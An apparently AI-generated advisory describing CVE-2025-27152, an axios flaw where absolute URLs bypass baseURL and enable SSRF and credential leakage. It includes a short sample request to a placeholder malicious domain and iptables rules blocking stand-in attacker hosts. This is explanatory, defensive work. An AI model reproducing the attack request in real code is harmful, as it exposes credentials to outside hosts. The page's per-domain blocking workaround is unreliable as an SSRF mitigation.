CVE-2025-27152 Overview
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in version 1.8.2.
Critical Impact
The vulnerability in axios could lead to Server-Side Request Forgery (SSRF) and credential leakage, impacting confidentiality and integrity.
Affected Products
- axios axios
Discovery Timeline
- Not Available - Vulnerability discovered by Not Available
- Not Available - Responsible disclosure to axios
- Not Available - CVE CVE-2025-27152 assigned
- Not Available - axios releases security patch
- 2025-03-07T16:15:38.773 - CVE CVE-2025-27152 published to NVD
- 2025-09-22T18:52:22.807 - Last updated in NVD database
Technical Details for CVE-2025-27152
Vulnerability Analysis
The vulnerability arises when axios handles absolute URLs instead of protocol-relative URLs. In such cases, the baseURL configuration is bypassed, leading to potentially unintended destinations being contacted, which can facilitate SSRF attacks and result in credential leakage.
Root Cause
The root cause is the mishandling of URL configurations within axios, where absolute URLs take precedence over a predefined baseURL.
Attack Vector
This vulnerability is exploited over the network, where an attacker crafts a request with an absolute URL to divert the request to malicious endpoints.
// Example exploitation code (sanitized)
axios.defaults.baseURL = 'https://safe-domain.com';
axios.get('http://malicious-domain.com/data')
.then(response => console.log(response))
.catch(error => console.error(error));
Detection Methods for CVE-2025-27152
Indicators of Compromise
- Requests being sent to unexpected or malicious domains
- Unusual outbound traffic patterns
- Unauthorized data access or API calls logs
Detection Strategies
- Analyze network traffic for unexpected outbound requests originating from axios clients.
- Implement logging mechanisms to capture complete request details and compare them against known safe domains.
Monitoring Recommendations
- Utilize anomaly detection systems to identify irregular communication patterns.
- Set up alerts for access to unauthorized or unexpected domain names.
How to Mitigate CVE-2025-27152
Immediate Actions Required
- Upgrade to axios version 1.8.2 or later
- Review all axios configurations to ensure no hardcoded absolute URLs
- Implement strict outbound traffic rules and domain whitelisting
Patch Information
The issue has been resolved in axios version 1.8.2. All users of earlier versions should upgrade immediately.
Workarounds
- Implement network-level access controls to restrict requests to known safe endpoints only.
# Configuration example
yum install iptables
iptables -A OUTPUT -d evil.com -j DROP
iptables -A OUTPUT -d maliciou-site.com -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
